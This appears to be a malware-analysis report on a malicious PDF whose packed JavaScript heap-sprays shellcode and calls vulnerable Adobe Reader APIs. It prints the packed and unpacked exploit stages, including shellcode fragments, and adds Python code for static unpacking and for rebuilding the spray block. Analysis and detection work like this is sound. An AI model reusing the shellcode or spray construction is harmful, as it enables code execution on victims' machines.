Verdict: MALICIOUS
Risk Score: 284
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF carries an embedded /JS stream whose JavaScript is wrapped in the Dean Edwards p,a,c,k,e,d packer (eval(function(p,a,c,k,e,d){...})). Static unpacking, without executing the script, recovered the inner stage: it assembles %u-encoded shellcode from arrays of string fragments, heap-sprays it (spray address 0x0c0c0c0c, with a 0x30303030 variant selected by a parameter), and calls two Adobe Reader JavaScript APIs with known vulnerabilities, Collab.getIcon (CVE-2009-0927) and Collab.collectEmailInfo (CVE-2007-5659). Both API calls are visible only after deobfuscation, which is why the rule hits below are marked as identified post-unpacking. The shellcode's role is to download and execute a secondary payload, so the document acts as a downloader / initial-access stage.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9989
Heuristics (7)
- Collab.getIcon — CVE-2009-0927 (critical; exact CVE match; rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument and allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; exact CVE match; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(); one of a series of Acrobat JavaScript API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Optional Content Group with action trigger (low; rule PDF_OPTIONAL_CONTENT): an Optional Content Group (layer) co-occurs with an action trigger; content can be selectively hidden from viewers or scanners while the action still fires on open.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
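The chain the artifact list below describes (FlateDecoded stream, UTF-16 /JS text, Dean Edwards stage, API-level rules) as a runnable Python triage script. This is an added example, not the analyzer's or the page's own code: the stream scanner is deliberately minimal (direct /Length values, a single filter, no xref walking), the rule patterns are the example's own although the rule ids follow the report, and the one-object PDF it builds is constructed inline, not the analyzed sample. The point it demonstrates is that the CVE rules cannot fire on the packed text; they fire only after the p,a,c,k,e,d layer is undone statically, without handing the script to an interpreter.

```python
"""Static triage of a PDF /JS stream in the order the report's artifacts list it:
inflate the FlateDecode stream, decode the text, strip the Dean Edwards p,a,c,k,e,d
wrapper without running eval, then apply API-level rules to the unpacked stage."""
import re
import zlib
from typing import Optional

# Minimal stream scanner for a flat dump: dictionary, then exactly /Length bytes.
# Assumptions: direct /Length values, a single filter, no xref walking.
STREAM_RE = re.compile(rb"<<(?P<dict>[^>]*?)>>\s*stream\r?\n", re.S)

# Signature of the Dean Edwards packer; the four groups are its call arguments.
PACKER_RE = re.compile(
    r"eval\(function\(p,a,c,k,e,[dr]\).*?return p\}\("
    r"'(?P<p>.*)',(?P<a>\d+),(?P<c>\d+),'(?P<k>[^']*)'\.split\('\|'\)", re.S)

# Rule ids follow the report; the patterns are this example's own.
RULES = {
    "CVE_2009_0927": (r"Collab\s*\.\s*getIcon", "critical"),
    "CVE_2007_5659": (r"Collab\s*\.\s*collectEmailInfo", "critical"),
    "JS_STAGING": (r"\b(eval|unescape|fromCharCode)\b", "info"),
}

def extract_streams(pdf: bytes) -> list:
    """Body of every stream in the dump, inflated when the dictionary says /FlateDecode."""
    out = []
    for m in STREAM_RE.finditer(pdf):
        length = re.search(rb"/Length\s+(\d+)", m.group("dict"))
        if not length:
            continue                      # indirect /Length: outside this scanner's scope
        body = pdf[m.end(): m.end() + int(length.group(1))]
        if b"/FlateDecode" in m.group("dict"):
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue                  # truncated or chained filters: skip, don't crash
        out.append(body)
    return out

def decode_js_text(raw: bytes) -> str:
    """/JS text may be UTF-16 with a byte-order mark (the report's first artifact is
    2 x 9778 + 2 bytes); an ASCII grep over such a stream sees only every other byte."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("latin-1")

def packer_symbol(index: int, base: int) -> str:
    """The packer's e(c): the short token that stands for dictionary slot `index`."""
    prefix = "" if index < base else packer_symbol(index // base, base)
    index %= base
    if index > 35:
        return prefix + chr(index + 29)          # 36..61 -> 'A'..'Z'
    return prefix + "0123456789abcdefghijklmnopqrstuvwxyz"[index]

def unpack_dean_edwards(script: str) -> Optional[str]:
    """Undo one p,a,c,k,e,d layer statically; None when the signature is absent."""
    m = PACKER_RE.search(script)
    if m is None:
        return None
    base, count = int(m.group("a")), int(m.group("c"))
    words = m.group("k").split("|")
    if len(words) != count:
        raise ValueError("dictionary has %d entries, count says %d" % (len(words), count))
    # d[e(c)] = k[c] || e(c): an empty slot maps its token to itself.
    table = {}
    for i in range(count):
        table[packer_symbol(i, base)] = words[i] or packer_symbol(i, base)
    # The packer's fast path rewrites every \w+ word through that table in one pass.
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)),
                  m.group("p"), flags=re.ASCII)

def triage(script: str) -> dict:
    """{rule_id: (severity, hit_count)} for every rule that fires on `script`."""
    hits = {}
    for rule_id, (pattern, severity) in RULES.items():
        n = len(re.findall(pattern, script))
        if n:
            hits[rule_id] = (severity, n)
    return hits

def analyze_pdf(pdf: bytes) -> list:
    """One record per stream: hits on the raw text, and on the unpacked stage if any."""
    records = []
    for raw in extract_streams(pdf):
        text = decode_js_text(raw)
        rec = {"raw": triage(text), "unpacked": None, "unpacked_source": None}
        inner = unpack_dean_edwards(text)
        if inner is not None:
            rec["unpacked"], rec["unpacked_source"] = triage(inner), inner
        records.append(rec)
    return records

# Constructed sample, not the page's stream: a heap spray handed to Collab.getIcon,
# packed with the same wrapper as the report's stream, stored UTF-16LE with a BOM
# and Flate-compressed into a one-object PDF fragment.
SAMPLE_PACKED = (
    r"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    r"+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    r"if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}"
    r"k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};"
    r"while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}"
    r'''return p}('0 1=2("%u9090%u9090");0 3=1;4(3.5<0x40000){3+=3}6.7(3);','''
    r"62,8,'var|sc|unescape|big|while|length|Collab|getIcon'.split('|'),0,{}))"
)

def build_sample_pdf() -> bytes:
    body = zlib.compress(b"\xff\xfe" + SAMPLE_PACKED.encode("utf-16-le"))
    return (b"%PDF-1.4\n20 0 obj\n<< /Length " + str(len(body)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")

if __name__ == "__main__":
    for rec in analyze_pdf(build_sample_pdf()):
        print("raw stage:     ", rec["raw"])          # staging tokens only
        print("unpacked stage:", rec["unpacked"])     # the CVE rule fires here
```

Run against the sample, the raw stage reports only JS_STAGING (eval, fromCharCode and the dictionary word unescape), while the unpacked stage reports CVE_2009_0927; that is the same "identified after JavaScript deobfuscation" split the heuristics list shows. Real streams add two complications this scanner ignores on purpose: indirect /Length references and filter chains, both of which a proper PDF parser resolves.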
Extracted artifacts (3)
Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0020_000.js
SHA-256: 6feb9c083d17fddd4ecf50b4e049aacb54dc9251dd9ebda5fd0e5b79240eca98
Kind: pdf-javascript-stream
Source: PDF /JS object 20 at offset 0x35A3
Size: 19558 bytes
Preview (first 1,000 lines of the extracted script). The artifact is UTF-16LE with a FF FE byte-order mark (19558 bytes = 2 x 9778 + 2, consistent with the decompressed stream below at two bytes per character plus the mark); it is shown decoded here:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}(
'g 2p=R M();g 1n;1u 2o(i,I){1r(i.X*2<I){i+=i}i=i.4b(0,I/2);49 i}1u Z(12){v(12==0){g T=1U;g z=R M("%1N","%1S%k","1t%3W","0%1Z","83%3Z","7%L","d3%h","O%46","b9%4t","1%1M%k","50%3P","1a%1Q","9%2U","%2R","f%2S%","2Z%u","37%L","d3%35","af%2f","%31","%32","3%2Q","%2P","b%2D","c%2f","%2C%u","2N%1g","5c%3H","f%3m%","n%","1y%r","3j%m%","1J%3g","42%1O","2%2m","7%3i%u","1l%u","3v%3w","%7c%","1x","%23%","6T%L","d2%2m","7%6D%h","6K%t","7G%7F","f%n%u","7C%1e","7A%u","1l%u","7m%7h","b%1B%","m%7q","e%5L%","n","%2c%r","5J%1s","V%5v","%5j%5a","13%5f%","5t%","5q%6h","6%6w","d3%5Y%","5W%","60%h","66%n%","62%1A","9%63","28%71","cc%m%","64%","1y%","1B","%m","%1J%67","42%6b%u","6a%B","68%61","%5U%5T","6c%5S","0%5R%","5V%5Z","b6%5X","6%6d%","6e","%6r%1m","6q%6p","a%6s","bf%w","6t%r","6v%1w","bf%6u%u","6o%6n","%6g%u","6f%","6i%u","6j%","6m%","6l%u","6k%5Q","5P%5p%u","5o%","5n%5r","a6%5u%u","5s%5m","5l%5b%u","59%u","5g%h","5h%5k","%m%r","15%m%","n%h","O%r","15%27","7%5i%","1x","%5w%1w","b2%5I","3%5H%1j","5K%5O","%5N%h","5M%1j","5G%5F","a3%5z","6%5y","%5x%5A","bf%5B","%5E%u","5D%5C","%6x%w","6y%r","Y%u","7t%7s","%7r","f%7u%u","7v%1z","a1%7y","%7x%","7w%1A","f%7p%E","7j%w","7i%1z","bd%s","7k%7l","7%7o","8%7n","%7z","%23%u","7N%","26%7M","7%7L","%7O%","7P%7S","a%7R","0%2c%u","1X%m","%7K","%7J","%7D%u","7B%7E","a6%1Z","7I%7H%u","7g%k","7f%6M","4%n","%6L","c%6N","d2%h","O%6O%","6R%6Q","3%6P%w","6J%p","6I%G","6C%u","6B%6A","5%6z%","26%6E","V%w","6H%u","6G%6F","%6S%t","79%78","5e%77","0%7a%u","7b%1j","7e%r","7d%27","7%1G","76%74","c%6W","0%6V%u","1X%h","O%6U%","6X%6Y","a%1s","V%58%","70%","n%6Z","c%7T%u","1l%w","15%3q","8%3t","6%3u","%n%","m%L","d3%m%","n%1s","V%1O","3%m")}1k v(12==1){g T=3k;g z=R M("%1N%u","3x%k","1t%u",
... (truncated)

Artifact 2: stream_005_off000035a3.js
SHA-256: 4c6154aa5d472434de2b8019f51905bf3bc8a10cab0c59e4f119075e60b2985c
Kind: decompressed-pdf-stream
Source: PDF FlateDecoded stream at offset 0x35A3
Size: 9778 bytes
Detection:
- ClamAV: no threats found
- Obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building tokens)

Artifact 3: dean_edwards_stage_000.js
SHA-256: cb9b36aadf3fcb5a91cc30fe57b690cd5033117e97c216d39779349c9bd27cb0
Kind: deobfuscated-js
Source: Dean Edwards unpacked JavaScript (decompressed) at offset 0x35A3
Size: 8383 bytes
Detection:
- ClamAV: no threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building tokens)
Preview (first 1,000 lines of the extracted script):
var vg9ysD1O0=new Array();var aqfqVnLx;function bt454MEpG(hxYlO8YNp,zNvuIAcmD){while(hxYlO8YNp.length*2<zNvuIAcmD){hxYlO8YNp+=hxYlO8YNp}hxYlO8YNp=hxYlO8YNp.substring(0,zNvuIAcmD/2);return hxYlO8YNp}function bcS1QJrB3(aJvpABrgq){if(aJvpABrgq==0){var rVcRmtEm=0x0c0c0c0c;var i5nyTJor=new Array("%u9c60","%u00e8%u0","000%u5d0","0%ued","83%ub80","7%ubf","d3%u4","0d7%uf0","b9%u000","1%u3100%u0","d44%u83","1a%u04e","9%uf775","%u8e2","f%u2417%","ubad0%u","40e7%ubf","d3%u4c","af%uff58","%ucbdb","%ua3a","3%ucb7a","%ub78","b%u493","c%uff58","%ucde3%u","c393%u18","5c%u57e","f%u41f8%","ubfd3%","ud55a%ub","e86%u40d7%","u4081%u57","42%ubfd","2%ucdd","7%udf46%u","40d6%u","edd3%ubf87","%ub046%","u40d6","%u36d3%","u5f52%ubf","d2%ucdd","7%u9c46%u4","0d6%ue","dd3%uabb","f%ubfd3%u","bfd7%ua","c46%u","40d6%u","32d3%u454","b%ubef0%","u40d7%u0a5","e%u401d%","ubfd3","%ufd5a%ub","f33%u40","d7%u76e2","%uc47b%ucb","13%uc8d1%","ub4d7%","uab96%u372","6%u4b","d3%ubfb9%","u40bd%","u2a5e%u4","1f4%ubfd3%","u1785%ubfb","9%ud5","28%ube","cc%u40d7%","ubab9%","ud55a%","ubef0","%u40d7","%u4081%u5b","42%ubfd2%u","70d7%u1","113%ubda2","%u8053%u35","6c%u221","0%u83b6%","udaa1%u24","b6%ucdb","6%u3593%","ud2be","%u0eae%uc","dbc%u21b","a%u91","bf%u3","8b2%ub","fb6%u34","bf%ucfa7%u","6fed%udcfc","%u30b6%u","cbba%","u2cb6%u","8fe1%","u79e7%","udcfd%u","2db8%ud9","fc%u32b8%u","dab1%","u6fa4%ucf","a6%u21b3%u","daa7%u30","f9%ucfbb%u","29e8%u","82b7%u4","0e4%ubf68","%u40d7%ub","fd3%u40d7%","ubfd3%u4","0d7%ub","fd3%u40d","7%ub0d3%","u40d6","%uf8d3%u34","b2%ucd8","3%u23b8%ud","b92%u32b3","%uccb6%u4","0a4%ud","a94%u14","a3%ud2b","6%u10a7","%ucbb2%u01","bf%uf3d3","%u21b8%u","f3b7%u22be","%udea1%u3","9a5%ub","f92%u","2980%ufabd","%u25a","f%ubfb0%u","356c%ud3","a1%u2fba","%u91bd%","u2cb3%ubfb","f%u1282%uf","b9f%u3","7b8%ud3","bd%u2","1b8%uebb","7%u06b","8%ud3ba","%u01b2","%u36d3%u","494a%","ubfd1%ucbd","7%u8390","%u045c%","uc7d0%u345","a%ua3d","0%ufd5a%u","be2e%u40d7","%ubc62","%u417a","%u140b%u","8929%u47","a6%ued","d6%ub
ecc%u","40d7%u0","25e%u41f","4%ubfd3","%uf55","c%ubd","d2%u4","0d7%u455a%","ub95e%u7fe","3%u3579%u3","82e%u6","918%u8","e2a%u","ed0c%ubc8","5%u4952%","ubfd1%uc9","d7%u3","615%u","b31f%u3675","%u3416%ue","1d5%u97","5e%u549","0%u1e3f%u","5c02%ud","dd4%ub","dd6%u40d","7%u08","dc%u81c","c%ubd3","0%uddd4%u","be2e%u4","0d7%ubc58%","uc5d4%ubdd","a%u40","d7%u0254%","u41c8%","ubfd3%uc77","c%ua06e%u","40d6%u3","fd3%ufbe","8%u1ba","6%u4014","%ubfd3%","u40d7%ubf","d3%u40d7%","ubfd3%u40","d7%ubfd","3%u40d7")}else if(aJvpABrgq==1){var rVcRmtEm=0x30303030;var i5nyTJor=new Array("%u9c60%u","00e8%u0","000%u","5d00%ued8","3%ub807%","u1173%u4f","92%ue","8b9%u00","01%u3100%u","0d44%u831","a%u04e","9%uf7","75%u20","8f%u2b52","%u1470","%u4fa2%u11","73%u43ea%u","51f8%","uc49e%u0d0","3%uc43f","%u192b%u","4679%u51f","8%uc2a6%","u6d33%u17","19%uf94","f%u4eb","4%u1173%","uda1f%u","103f%","u4f92","%uee2","1%u4107%u","1172%","uc292","%u46e","6%u4f","93%u4373%","ub0c2%u","17e6%u","4f93%u98","73%u5917","%u1172","%uc292","%u0be6%u4f","93%u43","73%ua3fa","%u1173%ub0","92%u1b","e6%u4f93%","u9c73%u","4a0e%u1069","%u4f92%ua4","fe%u4","f58%u","1173%uf21","f%u11a","4%u4f92","%ud842%","ucb3e%u6","5b3%uc79","4%u1a77","%ua4d3%u99","86%u4496","%u1119","%u4ff8","%u84f","e%u4e","88%u1173%","u18c0%u11","19%uda6d","%u1065","%u4f92","%u141","9%uda","1f%u10","69%u4f","92%uee21%u","5d07%","u1172%u","7f92%ubfb3","%ub2e7%u","2ef3%u","3a29%u8cb","0%u8cf3%u","7015%u3b","f1%u7924%u","21f7%u745","d%u2a","ea%u797","3%u3b","e6%u2b0","3%u60","bd%u7010","%u26e","2%u70","07%u7d","fe%u214","3%u61ab%","u7e10%u60f","f%u7e15%u2","de0%u621","6%u3a","bd%u7","503%u3","bf3%u3f","16%u27e","2%u2e03%u2","bfb%u","254e%uf4","92%u1173%u","4f92%u117","3%u4f","92%u1","173%u4","f92%u11","73%u4","f92%u1075%","u4f92","%u7434%u","1fe6%u","7e01%u","0ef1%","u7517","%u2ae0%u62","00%u0892","%u6516%u","2ac6%u6","11e%u2ec","2%u7907","%u4fd3%","u7e3f%u2","bf3%u78","3f%u3df","0%u6312%u0","eeb%u4673%","u21fb%u69","36%u2cf7%","uaa73","%u3de7%u","7c1f%","
u21fd%u755","d%u23","fe%u4","473%u03c","0%u7e37%","u21e5%u7e","1f%u2","bf3%u7e27","%u26d","4%u74
... (truncated)
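The unpacked stage above shows the spray machinery in the clear: arrays of %u fragments cut at arbitrary points, a pad helper (bt454MEpG) that doubles a string until length*2 reaches the requested size and then truncates to half of it, and a spray address of 0x0c0c0c0c (0x30303030 in the second variant). The following added Python example, which is not code from the page or the analyzer, rebuilds that machinery to show what the sprayed bytes look like in Reader's memory and why a grep for complete %uXXXX tokens undercounts until the fragments are concatenated. Its shellcode fragments are constructed (a GetPC prologue plus two NOPs), not the sample's; the pad and address functions mirror the unpacked script's logic as visible in the preview.

```python
"""Decode and rebuild the heap-spray block the unpacked stage constructs: %u fragments
are concatenated, unescape()d, padded by a doubling helper, and prefixed with a sled
made of the spray address itself."""
import re

ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX -> code unit U+XXXX, %XX -> U+00XX.
    Malformed sequences are left literal, exactly as the engine leaves them."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def to_memory_bytes(units: str) -> bytes:
    """Bytes as Reader's JS engine holds the string: UTF-16LE, two bytes per code unit.
    surrogatepass: shellcode routinely lands in U+D800..U+DFFF, which strict UTF-16 rejects."""
    return units.encode("utf-16-le", "surrogatepass")

def pad_to(units: str, total_bytes: int) -> str:
    """Mirror of the unpacked script's bt454MEpG(s, n): double the string until
    s.length*2 >= n, then substring(0, n/2). Lengths are code units; n is bytes."""
    while len(units) * 2 < total_bytes:
        units += units
    return units[: total_bytes // 2]

def spray_address_units(addr: int) -> str:
    """The address as two %u tokens, low half first, so the LE bytes read back as `addr`."""
    return "%%u%04x%%u%04x" % (addr & 0xFFFF, addr >> 16)

def build_spray_block(addr: int, shellcode_escaped: str, block_bytes: int) -> bytes:
    """One spray block: [sled of addr bytes ...][shellcode], exactly block_bytes long.
    0x0c0c0c0c sleds itself: 0C 0C is `or al, 0x0c`, so execution slides into the shellcode."""
    shellcode = js_unescape(shellcode_escaped)
    sled = pad_to(js_unescape(spray_address_units(addr)), block_bytes - 2 * len(shellcode))
    return to_memory_bytes(sled + shellcode)

def count_u_tokens(fragments) -> tuple:
    """(naive, joined): complete %uXXXX tokens seen per fragment vs. after concatenation.
    The array's split points fall inside tokens, so the naive count undercounts."""
    pat = re.compile(r"%u[0-9a-fA-F]{4}")
    naive = sum(len(pat.findall(f)) for f in fragments)
    joined = len(pat.findall("".join(fragments)))
    return naive, joined

def looks_like_getpc(code: bytes) -> bool:
    """call $+5 (E8 00 00 00 00) followed by pop r32 (58..5F) in the first 16 bytes:
    the position-independent prologue that typically opens sprayed shellcode."""
    i = code.find(b"\xe8\x00\x00\x00\x00", 0, 16)
    return i != -1 and i + 5 < len(code) and 0x58 <= code[i + 5] <= 0x5F

# Constructed fragments (not the page's array): the same splitting style as the
# unpacked preview, encoding pushad; pushfd; call $+5; pop ebp; nop; nop.
SHELLCODE_FRAGMENTS = ["%u9c60", "%u00e8%u0", "000%u5d0", "0%u9090"]

if __name__ == "__main__":
    code = to_memory_bytes(js_unescape("".join(SHELLCODE_FRAGMENTS)))
    print("shellcode:", code.hex(), "getpc:", looks_like_getpc(code))
    print("%u tokens naive/joined:", count_u_tokens(SHELLCODE_FRAGMENTS))
    block = build_spray_block(0x0C0C0C0C, "".join(SHELLCODE_FRAGMENTS), 0x10000)
    print("block bytes:", len(block), "head:", block[:8].hex(), "tail:", block[-10:].hex())
```

Two details matter when triaging a stage like this by hand: the %u token boundaries only line up after every array element is joined, so signature matching on the source text of the array misses most of the shellcode, and the bytes that reach memory are the UTF-16LE encoding of the unescaped string, which is why each %uXXXX token appears byte-swapped relative to the disassembly (%u9c60 is 60 9C, pushad then pushfd).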